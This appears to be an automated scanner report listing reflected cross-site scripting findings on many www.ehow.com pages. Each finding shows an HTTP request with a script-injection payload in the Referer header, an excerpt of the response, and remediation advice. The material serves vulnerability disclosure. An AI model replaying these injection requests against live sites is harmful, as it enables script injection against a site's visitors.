GET /home-design-and-decorating/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=f3f72</script><script>alert(1)</script>a019290626d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72787
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Design & Decorating - How To Information | e ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4071d</script><script>alert(1)</script>3ff02b2dbf8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-maintenance-and-repair/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=4071d</script><script>alert(1)</script>3ff02b2dbf8
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73460
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Maintenance & Repair - How To Information | ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee49f</script><script>alert(1)</script>99509508ba4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-safety-and-household-tips/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ee49f</script><script>alert(1)</script>99509508ba4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70626
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Safety & Household Tips - How To Information ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f883b</script><script>alert(1)</script>f66a86dc852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-security-alarm/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=f883b</script><script>alert(1)</script>f66a86dc852
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:53 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60630
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 674ae</script><script>alert(1)</script>7e706d5e99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housekeeping/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=674ae</script><script>alert(1)</script>7e706d5e99
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71853
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Housekeeping - How To Information | eHow.com</tit ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca85e</script><script>alert(1)</script>47ffba28361 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ca85e</script><script>alert(1)</script>47ffba28361
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:10 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27515
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 820fe</script><script>alert(1)</script>4ab6b57dae1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_13299_know-someone-lying.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=820fe</script><script>alert(1)</script>4ab6b57dae1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:17 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 81521
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Know if Someone Is Lying | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65c19</script><script>alert(1)</script>ba2639b56db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2053743_make-crock-pot-pork-roast.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=65c19</script><script>alert(1)</script>ba2639b56db
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:58 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75840
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Crock Pot Pork Roast | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32d36</script><script>alert(1)</script>a207535244d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2077554_repair-cracks-dashboard.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=32d36</script><script>alert(1)</script>a207535244d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:16 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75147
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Repair Cracks in a Dashboard | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0a9b</script><script>alert(1)</script>4d2f73e4a4f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2113353_end-sibling-feuds.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c0a9b</script><script>alert(1)</script>4d2f73e4a4f
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:24 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87612
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to End Sibling Feuds | eHow.com</title> <m ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4913</script><script>alert(1)</script>e5a0ba7fb0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2304056_cut-shirt-make-cuter.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=b4913</script><script>alert(1)</script>e5a0ba7fb0e
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:00 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 76882
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Cut a T Shirt To Make It Cuter | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c400e</script><script>alert(1)</script>9ed15557f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_3815_minutes-business-meeting.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c400e</script><script>alert(1)</script>9ed15557f52
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:01 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91165
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Take Minutes at a Business Meeting | eHow. ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b20</script><script>alert(1)</script>75e36263ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4469163_edit-pdf-document.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=52b20</script><script>alert(1)</script>75e36263ac
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:16 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78825
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Edit a PDF Document | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c68</script><script>alert(1)</script>58bb3213787 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4474239_make-graph-using-excel.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=f9c68</script><script>alert(1)</script>58bb3213787
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:01 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94464
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Graph Using Excel | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7370</script><script>alert(1)</script>1fdfe884e13 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4924781_open-pub-file-mac.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d7370</script><script>alert(1)</script>1fdfe884e13
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73379
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Open a Pub File on a Mac | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de30</script><script>alert(1)</script>08c31b04285 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5073161_convert-wps-file-extension.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8de30</script><script>alert(1)</script>08c31b04285
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:13 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75348
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Convert a WPS File Extension | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 792c3</script><script>alert(1)</script>e4edbcebfeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
